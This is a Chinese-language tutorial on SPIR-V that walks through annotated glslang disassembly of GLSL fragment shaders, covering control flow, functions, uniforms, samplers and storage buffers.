前面分支 / 循环 / 函数等测试主要是在 Fragment 这种 OpEntrypoint 下调用的子函数内部进行测试的。

下面的实验基本使用 Shader Playground 的 glslang trunk (上面写使用的 2022-09-19 的版本)，其中：

Shader stage 选择 frag
Target 选择 Vulkan 1.3
Output format 选择 SPIR-V

例子

通过例子来学习 SPIR-V 会比较快捷，也比较容易理解。

SPIR-V 本身是 SSA 形式的 IR，且指令 format 较为规整，易于解析 (虽然大家都是调库，也不会用手解析 SPIR-V 的)。

规范文档参考：

Khronos SPIR-V Registry

SPIR-V Unified Specifications

同时推荐用 Shader Playground 来方便直接看到 SPIR-V Disassembly。

据博主本人测试，OpenAI 的 GPT-4 有不错的 SPIR-V 到 GLSL 反汇编能力。

Layout

从反汇编结果可以看到，SPIR-V Module 有比较整齐的形式，事实上这些形式是规定好的：Logical Layout of a Module - SPIR-V Specification。

概观

#version 310 es
precision highp float;
precision highp int;
precision mediump sampler3D;

void main() {}

; SPIR-V
; Version: 1.6
; Generator: Khronos Glslang Reference Front End; 10
; Bound: 6                                                  ; Bound; where all <id>s in this module are
                                                            ; guaranteed to satisfy 0 < id < Bound
; Schema: 0                                                 ; Instruction Schema; Reserved, not used for now
               OpCapability Shader
          %1 = OpExtInstImport "GLSL.std.450"
               OpMemoryModel Logical GLSL450                ; Addressing model = Logical
                                                            ; Logical 模式下面，指针只能从已有的对象中创建，指针的地址也都是假的
                                                            ;   （也就是说，不能把指针的值拷贝到别的变量中去）
                                                            ; 也有一些带有物理指针的 Addressing Model 和相应的 Memory Model
                                                            ;   => 留待后文探索
                                                            ; Memory Model = GLSL450
               OpEntryPoint Fragment %main "main"           ; Execution Model = Fragment
                                                            ; Entrypoint = %main (用 OpFunction 定义的某个 Result ID)
                                                            ; Name = "main" (Entrypoint 要有一个字符串名字)
               OpExecutionMode %main OriginUpperLeft        ; The coordinates decorated by FragCoord
                                                            ; appear to originate in the upper left,
                                                            ; and increase toward the right and downward.
                                                            ; Only valid with the Fragment Execution Model.
               OpSource ESSL 310                            ; 标记源语言; ESSL = OpenGL ES Shader Language
               OpName %main "main"
       %void = OpTypeVoid
          %3 = OpTypeFunction %void
       %main = OpFunction %void None %3
          %5 = OpLabel
               OpReturn
               OpFunctionEnd

这里会发现 %main 这个 result id 是在后面定义的，但是前面却引用到了。

对于 SPV_OPERAND_TYPE_ID, SPV_OPERAND_TYPE_MEMORY_SEMANTICS_ID, SPV_OPERAND_TYPE_SCOPE_ID 来说，正常都需要先定义（是某个指令的 result id）再引用，但是可以前向定义的指令除外。

可前向定义的指令可以参考 source/val/validate_id.cpp:L122 @ SPIRV-Tools，其中包括：

全部的 OpTypeXXX 类指令

其它一大堆，主要是执行模式等 metadata、Decorate、分支、device side invoke 等

可以参考 spvOperandCanBeForwardDeclaredFunction (source/operand.cpp @ SPIRV-Tools) 这个函数

简单的函数

函数定义：

#version 310 es

float Circle( vec2 uv, vec2 p, float r, float blur )
{

    float d = length(uv - p);
    float c = smoothstep(r, r-blur, d);
    return c;

}

// skip some lines

SPIR-V 反汇编：

; == 相关定义 ==
%1 = OpExtInstImport "GLSL.std.450"                        ; 引入外部指令集
%float = OpTypeFloat 32
%v2float = OpTypeVector %float 2
%_ptr_Function_v2float = OpTypePointer Function %v2float
%_ptr_Function_float = OpTypePointer Function %float       ; 定义指针类型，指向的变量的 Storage Class 为 Function
%10 = OpTypeFunction %float %_ptr_Function_v2float %_ptr_Function_v2float %_ptr_Function_float %_ptr_Function_float

; == 函数 ==
%Circle_vf2_vf2_f1_f1_ = OpFunction %float None %10        ; 返回值类型 %float，Function Control 类型无
                                                           ; 函数类型 %10 - float (vec2, vec2, float, float)
         %uv = OpFunctionParameter %_ptr_Function_v2float  ; 拿到各个 parameter 的 result id
          %p = OpFunctionParameter %_ptr_Function_v2float  
          %r = OpFunctionParameter %_ptr_Function_float    
       %blur = OpFunctionParameter %_ptr_Function_float    
         %16 = OpLabel                                     ; 一个基本块的开始 (2.2.5. Control Flow)
          %d = OpVariable %_ptr_Function_float Function    ; 定义 float 变量, Storage Class 为 Function 
          %c = OpVariable %_ptr_Function_float Function    ; => 变量可以被 OpLoad / OpStore
         %39 = OpLoad %v2float %uv                         ; 结果类型 %v2float, 装载 %uv 变量的值
         %40 = OpLoad %v2float %p
         %41 = OpFSub %v2float %39 %40                     ; Operand2 - Operand1，结果类型 %v2float
         %42 = OpExtInst %float %1 Length %41              ; Execute an instruction in an imported set of extended instructions
                                                           ; Set (也就是这里的 %1) is the result of an OpExtInstImport instruction.
                                                           ; 后面的 Set 中的 Instruction 是 “Length”，操作数是 %41
               OpStore %d %42                              ; 存到 %d 变量的存储中
         %44 = OpLoad %float %r
         %45 = OpLoad %float %r
         %46 = OpLoad %float %blur
         %47 = OpFSub %float %45 %46                       ; %blur - %r
         %48 = OpLoad %float %d
         %49 = OpExtInst %float %1 SmoothStep %44 %47 %48  ; SmoothStep(%r, %blur - %r, %d)
               OpStore %c %49
         %50 = OpLoad %float %c
               OpReturnValue %50                           ; 不返回值的话使用 OpReturn
               OpFunctionEnd

函数的 in / out 参数

函数定义：

void inoutTest(in vec2 uv, out float o1, in float i2, out vec2 o2) {
    o2 = uv;
    o1 = i2;
}

       %main = OpFunction %void None %3
          %5 = OpLabel
         %v1 = OpVariable %_ptr_Function_v2float Function
         %t1 = OpVariable %_ptr_Function_float Function
         %t2 = OpVariable %_ptr_Function_float Function
         %v2 = OpVariable %_ptr_Function_v2float Function
      %param = OpVariable %_ptr_Function_v2float Function
    %param_0 = OpVariable %_ptr_Function_float Function
    %param_1 = OpVariable %_ptr_Function_float Function
    %param_2 = OpVariable %_ptr_Function_v2float Function
         %24 = OpLoad %v2float %v1
               OpStore %param %24
         %27 = OpLoad %float %t2
               OpStore %param_1 %27
         %29 = OpFunctionCall %void %inoutTest_vf2_f1_f1_vf2_ %param %param_0 %param_1 %param_2
         %30 = OpLoad %float %param_0   ; 可以看到，就是实现了 %param_0 变量内值的变化
               OpStore %t1 %30
         %31 = OpLoad %v2float %param_2
               OpStore %v2 %31
               OpStore %fragColor %38
               OpReturn
               OpFunctionEnd
%inoutTest_vf2_f1_f1_vf2_ = OpFunction %void None %10
         %uv = OpFunctionParameter %_ptr_Function_v2float
         %o1 = OpFunctionParameter %_ptr_Function_float
         %i2 = OpFunctionParameter %_ptr_Function_float
         %o2 = OpFunctionParameter %_ptr_Function_v2float

         %16 = OpLabel
         %17 = OpLoad %v2float %uv
               OpStore %o2 %17
         %18 = OpLoad %float %i2
               OpStore %o1 %18
               OpReturn
               OpFunctionEnd

分支

#version 310 es

int testIf(float range) {
    int c = 0;
    if (range < 1.0)
        c = 1;
    else
        c = 2;
    return c;
}

// skip some lines

SPIR-V 反汇编：

; == 相关定义 ==
      %int_0 = OpConstant %int 0
    %float_1 = OpConstant %float 1

; == 函数 ==
 %testIf_f1_ = OpFunction %int None %22
      %range = OpFunctionParameter %_ptr_Function_float
         %25 = OpLabel                                    ; 基本块开始
        %c_0 = OpVariable %_ptr_Function_int Function
               OpStore %c_0 %int_0
         %68 = OpLoad %float %range                       
         %71 = OpFOrdLessThan %bool %68 %float_1          ; check if %68 (loaded from %range) < %float_1
               OpSelectionMerge %73 None                  ; Declare a structured selection
                                                          ; This instruction must immediately precede either an OpBranchConditional or OpSwitch instruction. That is, it must be the second-to-last instruction in its block.
                                                          ; Selection Control = None; 这里可以给 Hint 提示此分支是否应该 remove
                                                          ; 并且指定 Merge Block 为 %73，也就是分支结束的地方
               OpBranchConditional %71 %72 %75            ; 如果 %71 为 true, 则跳到 %72 标号，否则跳到 %75 标号 - 标志基本块结束
         %72 = OpLabel                                    ; 
               OpStore %c_0 %int_1
               OpBranch %73                               ; Unconditional branch to %73
         %75 = OpLabel
               OpStore %c_0 %int_2
               OpBranch %73
         %73 = OpLabel
         %77 = OpLoad %int %c_0
               OpReturnValue %77
               OpFunctionEnd

总结：

OpSelectionMerge
OpBranchConditional
两个基本块最后 OpBranch 到出口

循环

术语

Merge Instruction: OpSelectionMerge 或者 OpLoopMerge 两者之一，用在
Header Block: 包含 Merge Instruction 的 Block
- Loop Header: Merge Instruction 是 OpLoopMerge 的 Header Block
- Selection Header: OpSelectionMerge 为 Merge Instruction, OpBranchConditional 是终止指令的 Header Block
- Switch Header: OpSelectionMerge 为 Merge Instruction, OpSwitch 是终止指令的 Header Block
Merge Block: 在 Merge Instruction 作为 Merge Block 操作数的 Block
Break Block: 含有跳转到被 Loop Header 的 Merge Instruction 定义为 Merge Block 的 Block
Continue Block: 含有跳转到 OpLoopMerge 指令的 Continue Target 的 Block
Return Block: 包含 OpReturn 或者 OpReturnValue 的 Block

GPT-4: 在 SPIR-V 中，Merge Block 是一个特定类型的基本块（Basic Block），用于控制流程结构中收敛控制流的位置。当你在 SPIR-V 中使用分支结构（如 if-else 语句、循环等）时，Merge Block 表示在这些分支结构末端的汇合点。

SPIR-V 中的控制流结构使用特殊的操作码（如 OpSelectionMerge、OpLoopMerge）来定义。这些操作码告诉编译器如何解释控制流图（Control Flow Graph，CFG）。Merge Block 用于表示这些控制流结构的结束位置，它是控制流从不同路径重新合并到一条路径的地方。例如，一个 if-else 语句会有两个分支，这两个分支在 Merge Block 之后合并为单个执行路径。

while 循环 - 无 break

int testWhile(int count) {
    int sum = 0;
    while (count >= 0) {
        sum++;
        count--;
    }
    return sum;
}

%testWhile_i1_ = OpFunction %int None %27
      %count = OpFunctionParameter %_ptr_Function_int
         %30 = OpLabel
        %sum = OpVariable %_ptr_Function_int Function
               OpStore %sum %int_0
               OpBranch %85
         %85 = OpLabel
               OpLoopMerge %87 %88 None                 ; Declare a structured loop.
                                                        ; This instruction must immediately precede
                                                        ; either an OpBranch or OpBranchConditional 
                                                        ; instruction. 
                                                        ; That is, it must be the second-to-last 
                                                        ; instruction in its block.
                                                        ; Merge Block = %87
                                                        ; Continue target = %88
               OpBranch %89
         %89 = OpLabel
         %90 = OpLoad %int %count
         %91 = OpSGreaterThanEqual %bool %90 %int_0     ; 有符号比较; if %90 (=count) >= %int_0 (0)
               OpBranchConditional %91 %86 %87          ; %91 == true ? jump to %86 : jump to %87 (FINISH)
         %86 = OpLabel
         %92 = OpLoad %int %sum
         %93 = OpIAdd %int %92 %int_1
               OpStore %sum %93                         ; sum = sum + 1
         %94 = OpLoad %int %count
         %95 = OpISub %int %94 %int_1
               OpStore %count %95                       ; count = count - 1
               OpBranch %88
         %88 = OpLabel
               OpBranch %85                             ; 无条件回到 Loop 头
         %87 = OpLabel
         %96 = OpLoad %int %sum
               OpReturnValue %96
               OpFunctionEnd

相当于翻译成了如下格式的 SPIR-V：

%header_block = OpLabel
                OpLoopMerge %merge_block %continue_block
                OpBranch %loop_body

   %loop_test = OpLabel
                OpLoopMerge %loop_merge %loop_cont

   %loop_cond = ...          ; Some calculations
                OpBranchConditional %loop_cond %loop_body %loop_merge
   
   %loop_body = OpLabel
                ...          ; Some codes inside loop body
                OpBranch %loop_cont

   %loop_cont = OpLabel
                OpBranch %loop_test

  %loop_merge = OpLabel
                ...          ; The "following" basic block

while 循环 - 带 break

int testWhile(int count) {
    int sum = 0;
    while (count >= 0) {
        sum++;
        count--;
        if (count == 2) {
            break;
        }
    }
    return sum;
}

SPIR-V 反汇编：

%testWhile_i1_ = OpFunction %int None %27
      %count = OpFunctionParameter %_ptr_Function_int
         %30 = OpLabel
        %sum = OpVariable %_ptr_Function_int Function
               OpStore %sum %int_0
               OpBranch %85

         %85 = OpLabel
               OpLoopMerge %87 %88 None
               OpBranch %89

         %89 = OpLabel
         %90 = OpLoad %int %count
         %91 = OpSGreaterThanEqual %bool %90 %int_0
               OpBranchConditional %91 %86 %87

         %86 = OpLabel
         %92 = OpLoad %int %sum
         %93 = OpIAdd %int %92 %int_1
               OpStore %sum %93
         %94 = OpLoad %int %count
         %95 = OpISub %int %94 %int_1
               OpStore %count %95
         %96 = OpLoad %int %count
         %97 = OpIEqual %bool %96 %int_2
               OpSelectionMerge %99 None              ; If 的 Merge Block = %99
               OpBranchConditional %97 %98 %99

         %98 = OpLabel
               OpBranch %87                           ; => break out of the loop => emit instruction
                                                      ;    to branch to while's merge block

         %99 = OpLabel                                ; 正常走 => 到达 while 末尾 => emit 到 while
               OpBranch %88                           ; 的 Continue Block

         %88 = OpLabel                                ; Continue Block 
               OpBranch %85

         %87 = OpLabel                                ; Merge Block
        %101 = OpLoad %int %sum
               OpReturnValue %101
               OpFunctionEnd

总结：

break 作为一个基本块末尾，直接 emit 无条件 branch 来跳到 while 循环的 merge block。

for 循环

GLSL 代码：

int testFor(int count) {
    int sum = 0;
    for (int i = 0; i < count; i++) {
        sum += 1;
    }
    return sum;
}

SPIR-V 反汇编：

%testFor_i1_ = OpFunction %int None %27
    %count_0 = OpFunctionParameter %_ptr_Function_int

         %33 = OpLabel
      %sum_0 = OpVariable %_ptr_Function_int Function
          %i = OpVariable %_ptr_Function_int Function
               OpStore %sum_0 %int_0
               OpStore %i %int_0
               OpBranch %109

        %109 = OpLabel
               OpLoopMerge %111 %112 None
               OpBranch %113

        %113 = OpLabel
        %114 = OpLoad %int %i
        %115 = OpLoad %int %count_0
        %116 = OpSLessThan %bool %114 %115
               OpBranchConditional %116 %110 %111

        %110 = OpLabel
        %117 = OpLoad %int %sum_0
        %118 = OpIAdd %int %117 %int_1
               OpStore %sum_0 %118
               OpBranch %112

        %112 = OpLabel                              ; Continuation Block
        %119 = OpLoad %int %i                       ; for 循环的循环结束操作放到了这里
        %120 = OpIAdd %int %119 %int_1
               OpStore %i %120
               OpBranch %109

        %111 = OpLabel                              ; Merge Block
        %121 = OpLoad %int %sum_0
               OpReturnValue %121
               OpFunctionEnd

总结：

Continuation Block 处现在 emit 了循环后维护操作

Uniform、BuiltIn 等其它 Scope 的变量

OpSource, OpName, OpMemberName 属于调试信息。

#version 310 es
precision highp float;
precision highp int;
precision mediump sampler3D;

// Anonymous uniform block - Import member names to shader directly
layout(binding = 0) uniform uniBlock {
    uniform vec3 lightPos;
    uniform float someOtherFloat;
};

layout(location = 0) out vec4 outColor;
layout(location = 0) in vec4 vertColor;

// This will not work:
// layout(binding = 0) uniform vec3 lightPos;
//  'non-opaque uniforms outside a block' : not allowed when using GLSL for Vulkan 

void mainImage(out vec4 c, in vec2 f, in vec3 lightPos) {}
void main() {mainImage(outColor, gl_FragCoord.xy, lightPos);}

Input / Output

所有可选 Decoration 可以参考 https://registry.khronos.org/SPIR-V/specs/unified1/SPIRV.html#Decoration

对于 gl_FragCoord：

                      OpName %gl_FragCoord "gl_FragCoord"
                      OpDecorate %gl_FragCoord BuiltIn FragCoord
%_ptr_Input_v4float = OpTypePointer Input %v4float
      %gl_FragCoord = OpVariable %_ptr_Input_v4float Input

对于 Input Variable：

                      OpName %vertColor "vertColor"
                      OpDecorate %vertColor Location 0
%_ptr_Input_v4float = OpTypePointer Input %v4float
                      %vertColor = OpVariable %_ptr_Input_v4float Input

对于 Output Variable：

                       OpName %outColor "outColor"
                       OpDecorate %outColor Location 0
%_ptr_Output_v4float = OpTypePointer Output %v4float
           %outColor = OpVariable %_ptr_Output_v4float Output

使用时直接 OpLoad 就可以。

Uniform Block (Anonymous)

匿名的 Uniform Block，其成员是被引入了 Global Scope 的。

可以作为 OpenGL 的 uniforms outside a block 的平替。

               OpName %uniBlock "uniBlock"
               OpMemberName %uniBlock 0 "lightPos"
               OpMemberName %uniBlock 1 "someOtherFloat"
               OpName %_ ""
               OpMemberDecorate %uniBlock 0 Offset 0             ; Structure type = %uniBlock
                                                                 ; Member = 0
                                                                 ; Decoration = Offset
                                                                 ; Byte Offset = 0
               OpMemberDecorate %uniBlock 1 Offset 12
               OpDecorate %uniBlock Block                        ; Apply only to a structure type to establish
                                                                 ; it is a memory interface block
               OpDecorate %_ DescriptorSet 0                     ; Apply only to a variable. 
                                                                 ; Descriptor Set is an unsigned 32-bit integer 
                                                                 ; forming part of the linkage between the client
                                                                 ; API and SPIR-V memory buffers, images, etc. 
                                                                 ; See the client API specification for more detail.
               OpDecorate %_ Binding 0                           ; Apply only to a variable.
                                                                 ; Binding Point is an unsigned 32-bit integer
                                                                 ; forming part of the linkage between the client
                                                                 ; API and SPIR-V memory buffers, images, etc.
                                                                 ; See the client API specification for more detail.
   %uniBlock = OpTypeStruct %v3float %float                      ; 后面指定所有成员的类型，这里是 {vec3, float}
%_ptr_Uniform_uniBlock = OpTypePointer Uniform %uniBlock         ; Storage Class = Uniform
          %_ = OpVariable %_ptr_Uniform_uniBlock Uniform
%_ptr_Uniform_v3float = OpTypePointer Uniform %v3float

         %34 = OpAccessChain %_ptr_Uniform_v3float %_ %int_0     ; Create a pointer into a composite object.
                                                                 ; Base = %_, Indexes = {%int_0}
                                                                 ; Each index in Indexes
                                                                 ; - must have a scalar integer type
                                                                 ; - is treated as signed
                                                                 ; - if indexing into a structure, must be an 
                                                                 ;   OpConstant whose value is in bounds for selecting a member
                                                                 ; - if indexing into a vector, array, or matrix, 
                                                                 ;   with the result type being a logical pointer type,
                                                                 ;   causes undefined behavior if not in bounds.
         %35 = OpLoad %v3float %34

Uniform Block (Named)

把上面的示例程序里面的 uniform uniBlock 类型的不具名 Uniform Block 加一个实例名字：

layout(binding=0) uniform uniBlock {
    uniform vec3 lightPos;
    uniform float someOtherFloat;
} uniInst;

// ..skip some lines..
void main() {mainImage(outColor, gl_FragCoord.xy, uniInst.lightPos);}

下面是相关的 SPIR-V：

               OpName %uniInst "uniInst"
               OpDecorate %gl_FragCoord BuiltIn FragCoord
               OpMemberDecorate %uniBlock 0 Offset 0
               OpMemberDecorate %uniBlock 1 Offset 12
               OpDecorate %uniBlock Block
               OpDecorate %uniInst DescriptorSet 0
               OpDecorate %uniInst Binding 0
   %uniBlock = OpTypeStruct %v3float %float
%_ptr_Uniform_uniBlock = OpTypePointer Uniform %uniBlock
    %uniInst = OpVariable %_ptr_Uniform_uniBlock Uniform
%_ptr_Uniform_uniBlock = OpTypePointer Uniform %uniBlock
    %uniInst = OpVariable %_ptr_Uniform_uniBlock Uniform
         %34 = OpAccessChain %_ptr_Uniform_v3float %uniInst %int_0
         %35 = OpLoad %v3float %34

可以看到，主要区别是 %_ 变成了 %uniInst，其实就是 OpName 从 "" 变成了 "uniInst"，这样 SPIR-V 反汇编工具生成的反汇编能更好看一些而已。真正的 Result ID 等的逻辑关系都是没有变化的。

当然，不知道反射库依赖不依赖 OpName，当然去掉了也不是没法反射就是了，只要 layout 一样，怼上去就得了。

Sampler

GLSL 源码：

#version 450

layout (binding = 1) uniform sampler2D samplerColor;
layout (binding = 2) uniform texture2D tex;
layout (binding = 3) uniform sampler samp;
layout (location = 0) in vec2 inUV;
layout (location = 1) in float inLodBias;
layout (location = 0) out vec4 outFragColor;

void main() 
{
    vec4 color = texture(samplerColor, inUV, inLodBias);
      vec4 color2 = texture(sampler2D(tex, samp), inUV, inLodBias);
    outFragColor = color + color2;
}

SPIR-V 反汇编：

; SPIR-V
; Version: 1.0
; Generator: Khronos Glslang Reference Front End; 10
; Bound: 40
; Schema: 0
               OpCapability Shader
          %1 = OpExtInstImport "GLSL.std.450"
               OpMemoryModel Logical GLSL450
               OpEntryPoint Fragment %main "main" %inUV %inLodBias %outFragColor
               OpExecutionMode %main OriginUpperLeft
               OpSource GLSL 450
               OpName %main "main"
               OpName %color "color"
               OpName %samplerColor "samplerColor"
               OpName %inUV "inUV"
               OpName %inLodBias "inLodBias"
               OpName %color2 "color2"
               OpName %tex "tex"
               OpName %samp "samp"
               OpName %outFragColor "outFragColor"
               OpDecorate %samplerColor DescriptorSet 0
               OpDecorate %samplerColor Binding 1
               OpDecorate %inUV Location 0
               OpDecorate %inLodBias Location 1
               OpDecorate %tex DescriptorSet 0
               OpDecorate %tex Binding 2
               OpDecorate %samp DescriptorSet 0
               OpDecorate %samp Binding 3
               OpDecorate %outFragColor Location 0
       %void = OpTypeVoid
          %3 = OpTypeFunction %void
      %float = OpTypeFloat 32
    %v4float = OpTypeVector %float 4
%_ptr_Function_v4float = OpTypePointer Function %v4float
         %10 = OpTypeImage %float 2D 0 0 0 1 Unknown
         %11 = OpTypeSampledImage %10
%_ptr_UniformConstant_11 = OpTypePointer UniformConstant %11
%samplerColor = OpVariable %_ptr_UniformConstant_11 UniformConstant
    %v2float = OpTypeVector %float 2
%_ptr_Input_v2float = OpTypePointer Input %v2float
       %inUV = OpVariable %_ptr_Input_v2float Input
%_ptr_Input_float = OpTypePointer Input %float
  %inLodBias = OpVariable %_ptr_Input_float Input
%_ptr_UniformConstant_10 = OpTypePointer UniformConstant %10
        %tex = OpVariable %_ptr_UniformConstant_10 UniformConstant
         %27 = OpTypeSampler
%_ptr_UniformConstant_27 = OpTypePointer UniformConstant %27
       %samp = OpVariable %_ptr_UniformConstant_27 UniformConstant
%_ptr_Output_v4float = OpTypePointer Output %v4float
%outFragColor = OpVariable %_ptr_Output_v4float Output

       %main = OpFunction %void None %3
          %5 = OpLabel
      %color = OpVariable %_ptr_Function_v4float Function
     %color2 = OpVariable %_ptr_Function_v4float Function
         %14 = OpLoad %11 %samplerColor
         %18 = OpLoad %v2float %inUV
         %21 = OpLoad %float %inLodBias
         %22 = OpImageSampleImplicitLod %v4float %14 %18 Bias %21
               OpStore %color %22
         %26 = OpLoad %10 %tex
         %30 = OpLoad %27 %samp
         %31 = OpSampledImage %11 %26 %30
         %32 = OpLoad %v2float %inUV
         %33 = OpLoad %float %inLodBias
         %34 = OpImageSampleImplicitLod %v4float %31 %32 Bias %33
               OpStore %color2 %34
         %37 = OpLoad %v4float %color
         %38 = OpLoad %v4float %color2
         %39 = OpFAdd %v4float %37 %38
               OpStore %outFragColor %39
               OpReturn
               OpFunctionEnd

总结如下：

Sampler (VK_DESCRIPTOR_TYPE_SAMPLER)

OpName %samp "samp"
OpDecorate %samp DescriptorSet 0
OpDecorate %samp Binding 3

%27 = OpTypeSampler
%_ptr_UniformConstant_27 = OpTypePointer UniformConstant %27
%samp = OpVariable %_ptr_UniformConstant_27 UniformConstant

Sampled Image (VK_DESCRIPTOR_TYPE_SAMPLED_IMAGE)

OpName %tex "tex"
OpDecorate %tex DescriptorSet 0
OpDecorate %tex Binding 2

%10 = OpTypeImage %float 2D 0 0 0 1 Unknown
%_ptr_UniformConstant_10 = OpTypePointer UniformConstant %10
%tex = OpVariable %_ptr_UniformConstant_10 UniformConstant

; 使用
%26 = OpLoad %10 %tex
%30 = OpLoad %27 %samp
%31 = OpSampledImage %11 %26 %30
%32 = OpLoad %v2float %inUV
%33 = OpLoad %float %inLodBias
%34 = OpImageSampleImplicitLod %v4float %31 %32 Bias %33

Combined Image Sampler (VK_DESCRIPTOR_TYPE_COMBINED_IMAGE_SAMPLER)

OpName %samplerColor "samplerColor"
OpDecorate %samplerColor DescriptorSet 0
OpDecorate %samplerColor Binding 1

%10 = OpTypeImage %float 2D 0 0 0 1 Unknown
%11 = OpTypeSampledImage %10
%_ptr_UniformConstant_11 = OpTypePointer UniformConstant %11
%samplerColor = OpVariable %_ptr_UniformConstant_11 UniformConstant

; 使用
%14 = OpLoad %11 %samplerColor
%18 = OpLoad %v2float %inUV
%21 = OpLoad %float %inLodBias
%22 = OpImageSampleImplicitLod %v4float %14 %18 Bias %21

注意关于 OpImage 和 OpSampledImage 的特殊规则：

All OpSampledImage instructions must be in the same block in which their Result <id> are consumed. Result <id> from OpSampledImage instructions must not appear as operands to OpPhi instructions or OpSelect instructions, or any instructions other than the image lookup and query instructions specified to take an operand whose type is OpTypeSampledImage.

在 spvtools::opt::InstrumentPass::MovePreludeCode @ source/opt/instrument_pass.cpp (SPIRV-Tools) 中对该要求进行了处理。

Storage Buffer

14.1.7. Storage Buffer

我的一个疑惑：

// 不可以编译通过
layout(std430, set = 1, binding = 0) readonly buffer objectBufferType {
    float someBeginningVar;
    ObjectData objects[]; 
    float someEndingVar;
} objectBuffer;

// 可以，参考 https://github.com/KhronosGroup/SPIRV-Guide/blob/master/chapters/access_chains.md
// 的例子
layout(std430, set = 1, binding = 0) readonly buffer objectBufferType {
    float someBeginningVar;
    ObjectData objects[];
} objectBuffer;

// （应该）可以编译通过
layout(std430, set = 1, binding = 0) readonly buffer objectBufferType {
    float someBeginningVar;
} objectBuffer;

GLSL 源码：

#version 450

layout (location = 0) out vec4 outFragColor;

struct ObjectData {
    vec4 model;
    float moreData;
    vec4 padThis;
};

struct WritableData {
    float testData;
};

// std430 vs std140: https://www.khronos.org/opengl/wiki/Interface_Block_(GLSL)
layout(std430, set = 1, binding = 0) readonly buffer objectBufferType {
    ObjectData objects[];
} objectBuffer;

layout(std430, set = 1, binding = 1) buffer myWritableBufferType {
    WritableData datas[];
} writableBuffer;

void main() 
{
    int index = int(gl_FragCoord.x * 1000);
    outFragColor = objectBuffer.objects[index].model;
    writableBuffer.datas[index].testData = 123;
}

SPIR-V 反汇编：

; SPIR-V
; Version: 1.0
; Generator: Khronos Glslang Reference Front End; 10
; Bound: 42
; Schema: 0
               OpCapability Shader
          %1 = OpExtInstImport "GLSL.std.450"
               OpMemoryModel Logical GLSL450
               OpEntryPoint Fragment %main "main" %gl_FragCoord %outFragColor
               OpExecutionMode %main OriginUpperLeft
               OpSource GLSL 450
               OpName %main "main"
               OpName %index "index"
               OpName %gl_FragCoord "gl_FragCoord"
               OpName %outFragColor "outFragColor"
               OpName %ObjectData "ObjectData"
               OpMemberName %ObjectData 0 "model"
               OpMemberName %ObjectData 1 "moreData"
               OpMemberName %ObjectData 2 "padThis"
               OpName %objectBufferType "objectBufferType"
               OpMemberName %objectBufferType 0 "objects"
               OpName %objectBuffer "objectBuffer"
               OpName %WritableData "WritableData"
               OpMemberName %WritableData 0 "testData"
               OpName %myWritableBufferType "myWritableBufferType"
               OpMemberName %myWritableBufferType 0 "datas"
               OpName %writableBuffer "writableBuffer"
               OpDecorate %gl_FragCoord BuiltIn FragCoord
               OpDecorate %outFragColor Location 0
               OpMemberDecorate %ObjectData 0 Offset 0
               OpMemberDecorate %ObjectData 1 Offset 16
               OpMemberDecorate %ObjectData 2 Offset 32
               OpDecorate %_runtimearr_ObjectData ArrayStride 48
               OpMemberDecorate %objectBufferType 0 NonWritable
               OpMemberDecorate %objectBufferType 0 Offset 0
               OpDecorate %objectBufferType BufferBlock
               OpDecorate %objectBuffer DescriptorSet 1
               OpDecorate %objectBuffer Binding 0
               OpMemberDecorate %WritableData 0 Offset 0
               OpDecorate %_runtimearr_WritableData ArrayStride 4
               OpMemberDecorate %myWritableBufferType 0 Offset 0
               OpDecorate %myWritableBufferType BufferBlock
               OpDecorate %writableBuffer DescriptorSet 1
               OpDecorate %writableBuffer Binding 1
       %void = OpTypeVoid
          %3 = OpTypeFunction %void
        %int = OpTypeInt 32 1
%_ptr_Function_int = OpTypePointer Function %int
      %float = OpTypeFloat 32
    %v4float = OpTypeVector %float 4
%_ptr_Input_v4float = OpTypePointer Input %v4float
%gl_FragCoord = OpVariable %_ptr_Input_v4float Input
       %uint = OpTypeInt 32 0
     %uint_0 = OpConstant %uint 0
%_ptr_Input_float = OpTypePointer Input %float
 %float_1000 = OpConstant %float 1000
%_ptr_Output_v4float = OpTypePointer Output %v4float
%outFragColor = OpVariable %_ptr_Output_v4float Output
 %ObjectData = OpTypeStruct %v4float %float %v4float
%_runtimearr_ObjectData = OpTypeRuntimeArray %ObjectData
%objectBufferType = OpTypeStruct %_runtimearr_ObjectData
%_ptr_Uniform_objectBufferType = OpTypePointer Uniform %objectBufferType
%objectBuffer = OpVariable %_ptr_Uniform_objectBufferType Uniform
      %int_0 = OpConstant %int 0
%_ptr_Uniform_v4float = OpTypePointer Uniform %v4float
%WritableData = OpTypeStruct %float
%_runtimearr_WritableData = OpTypeRuntimeArray %WritableData
%myWritableBufferType = OpTypeStruct %_runtimearr_WritableData
%_ptr_Uniform_myWritableBufferType = OpTypePointer Uniform %myWritableBufferType
%writableBuffer = OpVariable %_ptr_Uniform_myWritableBufferType Uniform
  %float_123 = OpConstant %float 123
%_ptr_Uniform_float = OpTypePointer Uniform %float

       %main = OpFunction %void None %3
          %5 = OpLabel
      %index = OpVariable %_ptr_Function_int Function
         %16 = OpAccessChain %_ptr_Input_float %gl_FragCoord %uint_0
         %17 = OpLoad %float %16
         %19 = OpFMul %float %17 %float_1000
         %20 = OpConvertFToS %int %19
               OpStore %index %20
         %29 = OpLoad %int %index
         %31 = OpAccessChain %_ptr_Uniform_v4float %objectBuffer %int_0 %29 %int_0
         %32 = OpLoad %v4float %31
               OpStore %outFragColor %32
         %38 = OpLoad %int %index
         %41 = OpAccessChain %_ptr_Uniform_float %writableBuffer %int_0 %38 %int_0
               OpStore %41 %float_123
               OpReturn
               OpFunctionEnd

总结：

               OpName %ObjectData "ObjectData"
               OpMemberName %ObjectData 0 "model"
               OpMemberName %ObjectData 1 "moreData"
               OpMemberName %ObjectData 2 "padThis"

               OpName %objectBufferType "objectBufferType"
               OpMemberName %objectBufferType 0 "objects"
               OpName %objectBuffer "objectBuffer"
               OpMemberDecorate %ObjectData 0 Offset 0
               OpMemberDecorate %ObjectData 1 Offset 16
               OpMemberDecorate %ObjectData 2 Offset 32
               OpDecorate %_runtimearr_ObjectData ArrayStride 48
               OpMemberDecorate %objectBufferType 0 NonWritable    ; 如果可变则无此 decorate
               OpMemberDecorate %objectBufferType 0 Offset 0
               OpDecorate %objectBufferType BufferBlock
               OpDecorate %objectBuffer DescriptorSet 1
               OpDecorate %objectBuffer Binding 0
 %ObjectData = OpTypeStruct %v4float %float %v4float
%_runtimearr_ObjectData = OpTypeRuntimeArray %ObjectData           ; Declare a new run-time array type.
                                                                   ; Its length is not known at compile time.
                                                                   ; See OpArrayLength for getting the Length
                                                                   ; of an array of this type.
